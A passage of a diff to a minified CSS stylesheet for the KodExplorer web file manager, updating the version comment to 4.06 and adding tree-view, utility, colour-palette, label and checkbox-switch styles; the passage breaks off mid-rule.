li{padding:0;margin:0;list-style:none;text-align:left;white-space:nowrap;outline:0;}.ztree li ul{margin:0;padding:0;}.ztree li.level0{margin-bottom:4px;}.ztree li.level0>span.tree_icon{width:20px;}.ztree li span{line-height:24px;}.ztree li span.button{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:24px;width:20px;margin-right:5px;}.ztree li span.button.switch{width:25px;height:25px;margin-right:0px;background:none;text-align:center;line-height:25px;}.ztree li span.button.switch:hover{background:rgba(0,0,0,0.03);}.ztree li span.button.switch:after{content:"\f0da";font-family:FontAwesome;color:#aaa;text-decoration:inherit;font-size:1.25em;line-height:16px;padding-left:6px;-webkit-font-smoothing:antialiased;}.ztree li span.button.switch.noline_docu:after{content:' ';}.ztree li span.button.switch.noline_open:after,.ztree li span.button.switch.noline_open_hover:after{content:"\f0d7";}.ztree li span.button.switch.switch_hover:after{color:#63acff;}.ztree li span.button.ico_loading{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.ztree li span.button.ico_loading .x-item-file{display:none;}.ztree li span.tree_icon{height:21px;width:21px;background:none;overflow:hidden;}.ztree li span.tree_icon img{width:100%;max-width:100%;max-height:100%;}.ztree li a{padding-top:0px;cursor:pointer;text-decoration:none;display:block;margin:0;color:#333;vertical-align:top;line-height:24px;height:24px;padding-left:10px;border:1px solid #fff;position:relative;}.ztree li a:hover{text-decoration:none;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;background:#eee;height:24px;border:1px solid #eee;}.ztree li a.curSelectedNode,.ztree li a.curDropTreeNode{border:1px solid #63acff;background:#63acff;line-height:24px;height:24px;color:#fff;}.ztree li a.curSelectedNode .button.switch:after,.ztree li a.curDropTreeNode .button.switch:after{color:#fff !important;}.ztree li a.curDropTreeNode{box-shadow:0 0 0 1px #fff inset !important;}.ztree li a.curSelectedNode_Edit{border:1px solid #63acff;background:#63acff;color:black;height:24px;}.ztree li a input.rename{height:25px;line-height:24px;padding:0;margin:0;border:none;outline:none;margin-left:-3px;padding-left:3px;width:106px;position:absolute;margin-top:-1px;}.ztree li a span.button.root_docu,.ztree li a span.button.noline_docu{background:none;}.ztree li a .menu-item{display:none;position:absolute;right:4px;top:4px;width:14px;height:13px;box-sizing:content-box;text-align:center;border:1px solid #ccc;background:#fff;border-radius:2px;cursor:pointer;z-index:50;}.ztree li a .menu-item:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.ztree li a .menu-item:hover .cert{border-top-color:#3399ff;}.ztree li a .menu-item .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.ztree li a:hover .menu-item,.ztree li a.curSelectedNode .menu-item{display:block;}ul.ztree.zTreeDragUL{margin:0;padding:0;position:absolute;width:auto;height:auto;background-color:#63acff;border:1px solid #63acff;opacity:0.5;filter:alpha(opacity=50);}ul.ztree.zTreeDragUL li a span.space{display:none !important;}ul.ztree.zTreeDragUL li a{padding:4px 10px 0 10px;color:#fff;}ul.ztree.zTreeDragUL li span.button.switch{display:none;}.ztree li a.tmpTargetNode_inner{background:#0076fc;border:1px solid #3091ff;color:#fff;}.ztree li a.tmpTargetNode_prev{border-bottom:1px solid #f96;}.ztree li a.tmpTargetNode_next{border-bottom:1px solid #f96;}span.tmpzTreeMove_arrow{display:inline-block;margin:4px 0 0 2px;position:absolute;border-color:transparent transparent transparent #fff;border-style:solid;border-width:7px 0px 7px 7px;width:0;height:0;_border-top-color:white;_border-bottom-color:white;_filter:chroma(color=white);}.frame-left .ztree li .file{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:22px;width:18px;margin-right:5px;}.frame-main{position:absolute;top:40px;width:100%;bottom:0px;}.frame-main .tools-left{background:#f8f8f8 url("../../../images/common/bg.gif") 0 0px;position:fixed;line-height:30px;padding-left:20px;height:28px;border-bottom:1px solid #ddd;left:0;width:100%;}.frame-main .tools-left a{font-size:1.25em;font-weight:800;text-decoration:none;color:#999;text-shadow:0 0 3px;display:inline-block;padding:2px 6px;margin-top:0;height:20px;line-height:20px;}.frame-main .tools-left a:hover{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;-webkit-box-shadow:0 2px 8px rgba(0,0,0,0.8);-moz-box-shadow:0 2px 8px rgba(0,0,0,0.8);box-shadow:0 2px 8px rgba(0,0,0,0.8);-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;}.frame-main .frame-left{position:absolute;left:0;top:30px;bottom:0;width:200px;background:#fff;background-attachment:fixed;overflow:auto;}.frame-main .frame-left .ztree{margin-top:0;}.frame-main .frame-left .ztree li.level0{margin-bottom:5px;}.frame-main .frame-resize{width:10px;cursor:col-resize;z-index:100;position:absolute;left:195px;top:0;bottom:0;overflow:hidden;background:url("../../../images/common/resize.png") 0px 50% no-repeat;}.frame-main .frame-resize.active{background:#000;opacity:0.2;filter:alpha(opacity=20);}.frame-main .frame-right{left:200px;right:0;position:absolute;top:0;bottom:0;overflow:auto;}.frame-main .frame-right .frame-right-main .resize-mask{z-index:999;position:absolute;left:0;top:0;bottom:0;right:0;display:none;}.frame-main .frame-right .frame-right-main .frame{height:100%;border-left:1px solid #ddd;overflow:hidden;} -/* ver 4.05(2017-08-26) [build 1503738068.8513] */ \ No newline at end of file +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100993.7246] */ +body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 